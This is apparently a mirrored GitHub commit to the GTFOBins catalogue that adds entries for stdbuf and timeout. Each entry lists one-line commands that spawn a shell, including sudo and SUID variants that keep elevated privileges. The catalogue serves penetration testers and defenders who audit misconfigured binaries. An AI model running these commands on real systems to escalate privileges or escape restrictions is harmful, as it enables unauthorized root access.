mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-29 23:02:54 +01:00
Add stdbuf, timeout
This commit is contained in:
parent
f6e3f6898a
commit
7387a2d3ac
9
_gtfobins/stdbuf.md
Normal file
9
_gtfobins/stdbuf.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: stdbuf -i0 /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo stdbuf -i0 /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./stdbuf -i0 /bin/sh -p
|
||||
---
|
9
_gtfobins/timeout.md
Normal file
9
_gtfobins/timeout.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: timeout 7d /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo timeout --foreground 7d /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./timeout 7d /bin/sh -p
|
||||
---
|
Loading…
Reference in New Issue
Block a user